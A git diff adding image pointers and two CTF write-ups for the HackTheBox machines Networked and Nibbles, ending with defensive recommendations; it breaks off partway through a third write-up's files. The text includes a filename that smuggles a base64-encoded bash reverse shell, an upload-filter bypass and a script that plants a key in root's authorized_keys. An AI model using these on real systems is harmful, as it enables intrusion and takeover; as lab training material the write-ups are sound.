+++ b/content/writeup-ctf/writeup-networked-htb/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8c02571f6a24a3534f5421bc0b82644ef405133671d5921ce01a5343f0a7e9f5
+size 18539
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-14.webp b/content/writeup-ctf/writeup-networked-htb/img/image-14.webp
new file mode 100644
index 0000000..4654601
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:893ca0e01605f356797e789d696a274a25128ebe702e48d092498abb45c75324
+size 18794
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-2.png b/content/writeup-ctf/writeup-networked-htb/img/image-2.png
new file mode 100644
index 0000000..e789b2e
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1a52652cbdb94366f0484677a906656a81f52c9d4915c2f711709d1ced301a53
+size 13489
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-2.webp b/content/writeup-ctf/writeup-networked-htb/img/image-2.webp
new file mode 100644
index 0000000..0d4515f
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5df2eebc7232e32393886374cc7a126d15197afdeafb7017762e229f8886548a
+size 9950
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-3.png b/content/writeup-ctf/writeup-networked-htb/img/image-3.png
new file mode 100644
index 0000000..cfeaa29
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:062ccfa834fb7fb1ae151d6c3c9dbc9c7b50457ee9789887200fb02adf2bf176
+size 107000
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-3.webp b/content/writeup-ctf/writeup-networked-htb/img/image-3.webp
new file mode 100644
index 0000000..fa5bc9f
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ea79ab201396f627e2dffdaa075c40e17cbae87cc46402533854265b96cd7d7e
+size 105768
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-4.png b/content/writeup-ctf/writeup-networked-htb/img/image-4.png
new file mode 100644
index 0000000..44abaf2
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1a8cd3f972a1f690c96e232f9ca7cc65f944416e3c945c4d0c10680f7933c055
+size 16152
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-4.webp b/content/writeup-ctf/writeup-networked-htb/img/image-4.webp
new file mode 100644
index 0000000..dc73d7f
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b8ae627cf32e2bf5e752f54e68a67705ef1a52481352a526490264a54dfd3779
+size 13876
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-5.png b/content/writeup-ctf/writeup-networked-htb/img/image-5.png
new file mode 100644
index 0000000..a497679
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:aef4f75daca24d531ddc55bd1f55407e5e1a93e2c9c512ac561f99add6a1246e
+size 13831
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-5.webp b/content/writeup-ctf/writeup-networked-htb/img/image-5.webp
new file mode 100644
index 0000000..8b1bd79
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f0ceea671b0d077498469e8c0a474707d42b44ce1cc57a96f54c75207d3b4d97
+size 19540
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-6.png b/content/writeup-ctf/writeup-networked-htb/img/image-6.png
new file mode 100644
index 0000000..eccc0fc
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f448a13b7634ed59a703671e65eb7d98cc74332e6bd8e0e42ccbcd7fe213f54b
+size 17816
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-6.webp b/content/writeup-ctf/writeup-networked-htb/img/image-6.webp
new file mode 100644
index 0000000..3fc563a
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:48528e433857ea0c78c2a7d9d714e805285e3cd367af34435bd2c42e23e1e7cd
+size 18184
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-7.png b/content/writeup-ctf/writeup-networked-htb/img/image-7.png
new file mode 100644
index 0000000..901819d
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3538620e15395cc0acf6aa0063e0bb4c707f40a3aff0938d865694fd81f431af
+size 2578
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-7.webp b/content/writeup-ctf/writeup-networked-htb/img/image-7.webp
new file mode 100644
index 0000000..6d9ef19
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:718ce11fa8ec1af61da4fb486fc17fcd7e78c18ddebdeb0d516a9f08818169f5
+size 1886
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-8.png b/content/writeup-ctf/writeup-networked-htb/img/image-8.png
new file mode 100644
index 0000000..97247f7
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b1e374b71b43e37b4ce065233527f10731470aafcb5ef58838c389fac8bd7362
+size 6837
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-8.webp b/content/writeup-ctf/writeup-networked-htb/img/image-8.webp
new file mode 100644
index 0000000..1c30ba5
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4d92aa6a1b5518fa54c4381dd5caa94646cb28eb1a63fe44eda096ff748ec314
+size 5492
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-9.png b/content/writeup-ctf/writeup-networked-htb/img/image-9.png
new file mode 100644
index 0000000..d8e2578
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4d9fe6d798e2f43d38c34abedd2dbd709518f3c06f4ed2369b72ba778e1b7082
+size 8094
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-9.webp b/content/writeup-ctf/writeup-networked-htb/img/image-9.webp
new file mode 100644
index 0000000..f2ac39d
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0b78e1395da033681c0764ab8936b4bf1ca948b8c9e5191650457b8ec16a96b1
+size 7388
diff --git a/content/writeup-ctf/writeup-networked-htb/index.md b/content/writeup-ctf/writeup-networked-htb/index.md
new file mode 100644
index 0000000..84374f2
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/index.md
@@ -0,0 +1,194 @@
+---
+title: "Writeup - Networked (HTB)"
+date: 2022-05-27
+slug: "writeup-networked-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Networked](https://app.hackthebox.com/machines/Networked) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.4)
+- 80/tcp : HTTP web server (Apache 2.4.6)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First, I start by scanning the pages of the website.
+
+![](img/image-3.webp)
+
+I find several pages interesting and especially `backup` in which you can find an archive.
+
+![](img/image-4.webp)
+
+I download the archive, unzip it and find the following files inside:
+
+![](img/image-5.webp)
+
+The different files correspond to pages of the site:
+
+![](img/image-6.webp)
+
+![](img/image-7.webp)
+
+So we have the possibility to upload images on the `upload.php` page and then to view them on the `photos.php` page.
+
+By analyzing the source code of the `upload.php` page I find that there are checks on the upload files.
+
+
+```php
+[...]
+list ($foo,$ext) = getnameUpload($myFile["name"]);
+    $validext = array('.jpg', '.png', '.gif', '.jpeg');
+    $valid = false;
+    foreach ($validext as $vext) {
+      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
+        $valid = true;
+      }
+    }
+[...]
+```
+So I'm not just going to be able to send a PHP reverse shell with the `.png` extension because the site checks the file signature to verify its type. The signature of a file is a set of magic byte at the beginning of a file. By looking in the following list I find the signature of the GIF files: [files signatures](https://en.wikipedia.org/wiki/List_of_file_signatures).
+
+Before adding the signature, my file is simply a Unicode text:
+
+![](img/image-8.webp)
+
+After adding the GIF signature, we can see that the file is now identified as a GIF image data.
+
+![](img/image-9.webp)
+
+In addition to this signature I will have to change the extensions so that the file passes the security, but also that it is executed as PHP by the server:
+
+
+```bash
+mv reverse.jpg reverse.php.gif
+```
+I can now upload it and go view it to execute the code and run the reverse shell.
+
+![](img/image-10.webp)
+
+I now have a reverse shell as `apache`. But I don't have the access to see the first flag. In the user's home folder, I notice 2 interesting files:
+
+![](img/image-11.webp)
+
+The first one is a CRON file that executes the `check_attack.php` script every 3 minutes.
+
+
+```bash
+*/3 * * * * php /home/guly/check_attack.php
+```
+The second one is the script that allows you to delete suspicious files from the `/var/www/html/uploads` :
+
+
+```php
+<?php
+require '/var/www/html/lib.php';
+$path = '/var/www/html/uploads/';
+$logpath = '/tmp/attack.log';
+$to = 'guly';
+$msg= '';
+$headers = "X-Mailer: check_attack.php\r\n";
+
+$files = array();
+$files = preg_grep('/^([^.])/', scandir($path));
+
+foreach ($files as $key => $value) {
+        $msg='';
+  if ($value == 'index.html') {
+        continue;
+  }
+  #echo "-------------\n";
+
+  #print "check: $value\n";
+  list ($name,$ext) = getnameCheck($value);
+  $check = check_ip($name,$value);
+
+  if (!($check[0])) {
+    echo "attack!\n";
+    # todo: attach file
+    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
+
+    exec("rm -f $logpath");
+    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
+    echo "rm -f $path$value\n";
+    mail($to, $msg, $msg, $headers, "-F$value");
+  }
+}
+
+?>
+```
+Interestingly, the script executes an `rm` command with a variable directly. All this without verification! So I will be able to create a file with a name composed of a command.
+
+The file name will be composed of a name, then a `;` to indicate the end of the command, then a reverse shell in base64 because we are not allowed to put `/` in the file name.
+
+To create the file I use the following command:
+
+
+```bash
+touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash'
+```
+I wait a few seconds and now I have a reverse shell and I can get the first flag.
+
+![](img/image-12.webp)
+
+## Privilege escalation
+
+First I check the sudo permissions of my user :
+
+![](img/image-13.webp)
+
+I have the right to run the `changename.sh` script as root. Looking at the code of the script, I determine that it allows to change the name of a network interface.
+
+
+```bash
+#!/bin/bash -p
+cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
+DEVICE=guly0
+ONBOOT=no
+NM_CONTROLLED=no
+EoF
+
+regexp="^[a-zA-Z0-9_\ /-]+$"
+
+for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
+        echo "interface $var:"
+        read x
+        while [[ ! $x =~ $regexp ]]; do
+                echo "wrong input, try again"
+                echo "interface $var:"
+                read x
+        done
+        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
+done
+```
+After some research on the Linux distributions used by the machine I find the following flaw: [CentOS Network Interface Exploit](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f).
+
+On CentOS there is an exploit that allows to execute commands as `root` via the name of a network interface.
+
+I execute the script and enter the following name for the interface:
+
+![](img/image-14.webp)
+
+I now have a reverse shell `root` and I can get the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave the source code of the website accessible by all
+- Set up an additional protection on the upload to avoid sending code
+- Do not use variables in commands without Sanitizing
diff --git a/content/writeup-ctf/writeup-nibbles-htb/featured.png b/content/writeup-ctf/writeup-nibbles-htb/featured.png
new file mode 100644
index 0000000..a1efe55
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2728984adb9ff67af8ccd0e721d18a0580cf655db339d379252e5d86c7ed983b
+size 242961
diff --git a/content/writeup-ctf/writeup-nibbles-htb/featured.webp b/content/writeup-ctf/writeup-nibbles-htb/featured.webp
new file mode 100644
index 0000000..b0e326a
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1030fe0d3e3815f705465f28566fa0873f4b32e583bc828eeb2dadd19cbeebd8
+size 25880
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png
new file mode 100644
index 0000000..f30d1e7
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8cb046b79ecab50607331c162c8f5ad06f3c3b9a3d0838c06c270032bb1a6405
+size 35033
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp
new file mode 100644
index 0000000..35d41ed
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6efca91a26b3e8ef34f20d032c75c22c3cdc2e01c81391c12f44d8bbd0dc1cd4
+size 30446
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png
new file mode 100644
index 0000000..2eae908
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d876bd1693160bf180f3424b2382dbd249c4c575131c6997ecab621404dea501
+size 38478
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp
new file mode 100644
index 0000000..8a85a0f
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8c6ba9a629a19d3e945ba76885dd95d47726057322cd806704ab39a339cec652
+size 48086
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png
new file mode 100644
index 0000000..d78bf9f
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:afe438e7ea228e870d34aae4ef8c60d50c1e55cc7f23c4d71cc226ddca9b2ccd
+size 21888
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp
new file mode 100644
index 0000000..84f69cc
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5ecbd2bddf49e40bbcca9fce273cada3dc3341c31bd3b17888369ab067a7c60c
+size 11970
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png
new file mode 100644
index 0000000..bbfc080
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a1a132471cef563e4209ea6b92d5bdaf37911e8f6334ee2f657a2844212a9c66
+size 74495
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp
new file mode 100644
index 0000000..08c3d14
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:32c6d25f6dfd1e46e99e5029408c847e280e61938a4988985bfa6bcbf29b2775
+size 75378
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png
new file mode 100644
index 0000000..3bc6c6a
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d5cd379a409cfd68429a3d49cde20d2e30aad7ea57a1e43699de532df2813076
+size 10254
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp
new file mode 100644
index 0000000..b208426
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1cc0846c299dfeb2ff6759d79ee1da420c15dad2e152611c31e808da06d135cc
+size 6172
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png
new file mode 100644
index 0000000..3af2beb
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:125debd8b152b36dc14d632690878453337c31668581a28fa1d7afdf7818eaec
+size 121057
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp
new file mode 100644
index 0000000..c2c6b15
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1e7d7e2df5c7139a72a0a8da5cf3ba3267f284d7fb63fd3cc660829eaae2e452
+size 124196
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png
new file mode 100644
index 0000000..e48bdec
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:72f78bd5fc1e55cb8611ab2e1cd7db9d79d7029655b6a91634686fd3711c639f
+size 18545
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp
new file mode 100644
index 0000000..7dd934c
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:77e99f6755423f77fbd9d3eeb9b7f3e5f1efd4446066b090850c2f82f326b4d8
+size 10326
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png
new file mode 100644
index 0000000..ca8343e
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f86b0817fd5424f504f74a1619d208ab8f7aabdf2fd3c9e4b165214a95e1b39d
+size 39876
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp
new file mode 100644
index 0000000..392ea48
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:14a15c6cb8a9dbb9edfae7f56356cfef350141e91444f663a6f96e9fc4d898e5
+size 35382
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png
new file mode 100644
index 0000000..e735b7c
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fb2472f7d76d9eb1774d057bece45404bf50d5da5ba7dac964bd062f3913aa8a
+size 16941
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp
new file mode 100644
index 0000000..afb54c9
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bdcf1b62e54dbed0197e40692953eafcf148a761b154f05fab8615db71da66e6
+size 20754
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png
new file mode 100644
index 0000000..b780c95
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:62a1b24239485495ddd0cabdee2b497686d29db42e199870988218831ae85c4b
+size 9411
diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp
new file mode 100644
index 0000000..6d5137e
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9e9c6eda536e8ac7214645ea22f454c7490157e2aef04bb8d07aebc12cf6271a
+size 13398
diff --git a/content/writeup-ctf/writeup-nibbles-htb/index.md b/content/writeup-ctf/writeup-nibbles-htb/index.md
new file mode 100644
index 0000000..9c2e532
--- /dev/null
+++ b/content/writeup-ctf/writeup-nibbles-htb/index.md
@@ -0,0 +1,101 @@
+---
+title: "Writeup - Nibbles (HTB)"
+date: 2022-05-17
+slug: "writeup-nibbles-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Nibbles](https://app.hackthebox.com/machines/Nibbles) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.2p2)
+- 80/tcp : HTTP web server (Apache 2.4.18)
+
+## Exploit
+
+Looking at the source code of the web page I found the following comment:
+
+
+```bash
+<!-- /nibbleblog/ directory. Nothing interesting here! -->
+```
+So I go to this new page:
+
+![](img/image-2.webp)
+
+I then search the pages present on the site with `ffuf`.
+
+![](img/image-3.webp)
+
+One page is particularly interesting: `admin`.
+
+![](img/image-4.webp)
+
+So I try to brute force the password of the `admin` user with the `hydra` command.
+
+![](img/image-5.webp)
+
+Although the command finds several results it does not work. Indeed there is an anti-brute force security. So I try to test common passwords and after a few tries I find the following credentials: `admin/nibbles`.
+
+It's good but rather frustrating not to have found a more legit way. After some research I find a solution online to test passwords taking into account the anti brute force: [brute force version](https://eightytwo.net/blog/brute-forcing-the-admin-password-on-nibbles/).
+
+I can now connect to the admin panel! After going through the panel, I find the following page where you can upload images.
+
+![](img/image-6.webp)
+
+So I try to send a reverse shell in php, then I go to the following link to execute it:
+
+
+```bash
+10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
+```
+I now have a reverse shell as a `nibbler` and I can get the first flag.
+
+![](img/image-7.webp)
+
+## Privilege escalation
+
+I start by checking the sudo permissions of my user:
+
+![](img/image-8.webp)
+
+I find it in my personal folder a `.zip` file, I unzip it :
+
+![](img/image-9.webp)
+
+The script can be modified by myself and can be executed as root. I put the following content in the script `monitor.sh` :
+
+
+```bash
+mkdir /root/.ssh
+touch /root/.ssh/authorized_keys
+echo 'id_rsa' > /root/.ssh/authorized_keys
+```
+This will create the SSH folder of the root user and then add my key in the `authorized_keys`. To execute the script I use the following command:
+
+
+```bash
+sudo -n ./monitor.sh
+```
+I can now log in as root and get the last flag.
+
+![](img/image-10.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave important comments in HTML code
+- Update NibbleBlog to fix file upload problem
+- Do not let user-modifiable scripts be executed by the root user
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png
new file mode 100644
index 0000000..57e8b7e
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ca424309d980684aefa5f9eed353222ff02c32896da283858be3575c70ae7aa8
+size 482981
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp
new file mode 100644
index 0000000..ae7da16
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d3f9b7f4413642ac680ac2ee76585560f215b8af2715b8b2270bf5d7fedecf3a
+size 482464
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png
new file mode 100644
index 0000000..42888ce
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0325f75ba2e071c53a8dd6832558e7cf57d0534e1a0b7cc0e061037da368a53c
+size 44434
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp
new file mode 100644
index 0000000..2d51207
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:25ca1e7534478abacb27fd747798e567bacb8fe7b619ee763124099efe24864c
+size 36242
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png
new file mode 100644
index 0000000..02edb76
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ac4d5d29657495c3d2abbca0a27072ffbb3658e6f23f8c251ba07ac8e85ee7df
+size 320376
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp
new file mode 100644
index 0000000..159426c
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:aa7b1cc87107152d6212f1edb12daf2981b359b871776e9600b6d8907c8738fd
+size 67106
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png
new file mode 100644
index 0000000..067501a
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:49b29bb2d7c67cf64ebba15266481697b08da9cd1b34f5315f773632a247e3f6
+size 10637
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp
new file mode 100644
index 0000000..0309895
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8f6dc6353f22b67dcc74f3e2c5c04ca2c761a3c2de08457c6edc69757bb289ed
+size 8988
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png
new file mode 100644
index 0000000..544f231
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:372f02d4abf77a951ba97c499f1fcb3a45ff37948fad95e63fd42a8dffc0e29a
+size 21100
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp
new file mode 100644
index 0000000..8bf815d
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
